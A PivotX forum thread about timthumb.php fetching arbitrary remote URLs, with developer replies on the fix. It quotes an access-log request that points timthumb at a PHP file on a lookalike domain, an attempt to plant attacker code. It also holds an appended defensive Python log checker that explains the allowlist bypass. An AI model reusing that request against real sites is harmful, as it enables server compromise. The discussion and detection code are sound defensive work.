Security: timthumb.php allows cross-site access by default


Security: timthumb.php allows cross-site access by default

Postby mskala » Sun May 23, 2010 2:47 pm

The file pivotx/includes/timthumb.php , which is used for making thumbnails of images, accepts the URL of the image to thumbnail as a query variable. Although the script includes code to check that the specified URL is local, or on a whitelist of allowed URLs, this code is disabled by default. There's a line that says "$allow_remote_all = true;", and as a result, it will accept any URL the user specifies and attempt to download an image from that URL. This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site); or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library. Downloading remote images this way, if it's ever allowed, certainly shouldn't be allowed by default; and the setting is not user-configurable but hardcoded in the script.
mskala
 
Posts: 10
Joined: Mon Mar 29, 2010 5:40 pm

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Sun May 23, 2010 5:53 pm

Hi and thanks for posting.

I do understand some of your concerns, and I will discuss it with Bob - who just recently enabled/allowed remote images. Unluckily it's not easy to control this using a PivotX config setting since timthumb.php is standalone.

mskala wrote:This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site);

Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

mskala wrote:or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library.

is a scary and much more likely problem.
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Tue May 25, 2010 7:19 pm

FYI: We no longer allow remote images by default - changed in revision 2729.
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Re: Security: timthumb.php allows cross-site access by defau

Postby scoude » Mon Oct 10, 2011 8:21 am

hansfn wrote:Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,


Hi,

I just had a hacker using my site with PivotX using this vulnerability ...

[cut by hansfn]
scoude
 
Posts: 2
Joined: Mon Oct 10, 2011 8:11 am

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Mon Oct 10, 2011 8:38 am

This was fixed in PivotX 2.3.0 - did you upgrade?

If you think a similar bug is present in 2.3.0, contact me directly at hansfn@pivotx.net - never disclose such details openly in the forum. Thx :-)

PS! This is a very old thread and your vulnerability isn't the same as the issue discussed in this thread (even if it's related).
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Security: timthumb.php

Postby winters » Fri May 20, 2016 9:04 pm

According to the host, I have a problem with

91.227.5.10 - - [17/May/2016:19:39:57 -0400] "GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" 200 15544 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

pivotx 2.3.11

Does someone know if this can be correct?

thanks!
winters
 
Posts: 82
Joined: Thu Jan 13, 2011 9:09 pm

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Sun May 22, 2016 8:50 pm

No, the default configuration of timthumb.php does not allow fetching files from img.youtube.com.dwell.kz, only from img.youtube.com (and other trusted hosts - see the $ALLOWED_SITES variable).

So, if your host claims that your timthumb.php misbehaves, you have either not updated the file when updating PivotX (it should say "This is timthumb version 2.8.4 - r200" at the beginning of the file) or you have set ALLOW_ALL_EXTERNAL_SITES to true, either in timthumb-config.php or in timthumb.php.

NB! The fact that someone tries to attack your timthumb.php doesn't prove or say that there is a vulnerability.
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway
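The check hansfn describes above (a src host must be on the $ALLOWED_SITES list) is easy to get wrong: a host like img.youtube.com.dwell.kz from the access-log line in the previous post begins with a trusted name but is a completely different domain. The following added example (not PivotX or timthumb code; the allowlist values, the BENIGN_LINE sample and the function names are assumptions for illustration) parses such log lines, extracts the src host and applies a strict suffix match, so a defender can confirm from their own logs whether a request would have been accepted.

```python
import re
from urllib.parse import urlparse, parse_qs

# Trusted hosts in the spirit of timthumb's $ALLOWED_SITES (assumed values for this example).
ALLOWED_SITES = ["img.youtube.com", "flickr.com", "imgur.com"]

# Log line quoted in the forum post above, plus a constructed benign request for comparison.
ATTACK_LINE = ('91.227.5.10 - - [17/May/2016:19:39:57 -0400] "GET /pivotx/includes/timthumb.php'
               '?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" 200 15544 "-" "Mozilla/5.0"')
BENIGN_LINE = ('203.0.113.7 - - [17/May/2016:19:40:02 -0400] "GET /pivotx/includes/timthumb.php'
               '?src=http%3A%2F%2Fimg.youtube.com%2Fvi%2Fabc%2F0.jpg&w=100 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"')

def host_allowed(host, allowed_sites=ALLOWED_SITES):
    """Strict allowlist: the host must equal a trusted site or be a subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in allowed_sites)

def naive_host_allowed(host, allowed_sites=ALLOWED_SITES):
    """The loose check to avoid: accepts any host that merely contains a trusted name."""
    return any(site in host.lower() for site in allowed_sites)

# Request portion of a common/combined access-log line: "METHOD path HTTP/x.y" status
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def check_log_line(line):
    """Return (src_host, allowed) for a timthumb request, or None if the line is not one.

    A src without scheme/host is a local path, reported as (None, True) because no
    remote fetch is involved. urlparse().hostname strips userinfo and ports, so a
    src like http://img.youtube.com@other.example/x yields other.example, not the
    trusted name."""
    m = LOG_RE.search(line)
    if not m or "timthumb.php" not in m.group("path"):
        return None
    query = urlparse(m.group("path")).query
    src = parse_qs(query).get("src", [""])[0]      # parse_qs percent-decodes the value
    parsed = urlparse(src)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return (None, True)
    return (parsed.hostname, host_allowed(parsed.hostname))

if __name__ == "__main__":
    for line in (ATTACK_LINE, BENIGN_LINE):
        host, ok = check_log_line(line)
        print(f"{host}: strict={ok} naive={naive_host_allowed(host)}")
```

Running it shows the dwell.kz host rejected by the strict check but accepted by the naive one, which is why an allowlist comparison must anchor on the full registered host rather than on a substring.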

Re: Security: timthumb.php allows cross-site access by defau

Postby winters » Mon May 23, 2016 8:29 pm

Thank you, Hans.
winters
 
Posts: 82
Joined: Thu Jan 13, 2011 9:09 pm

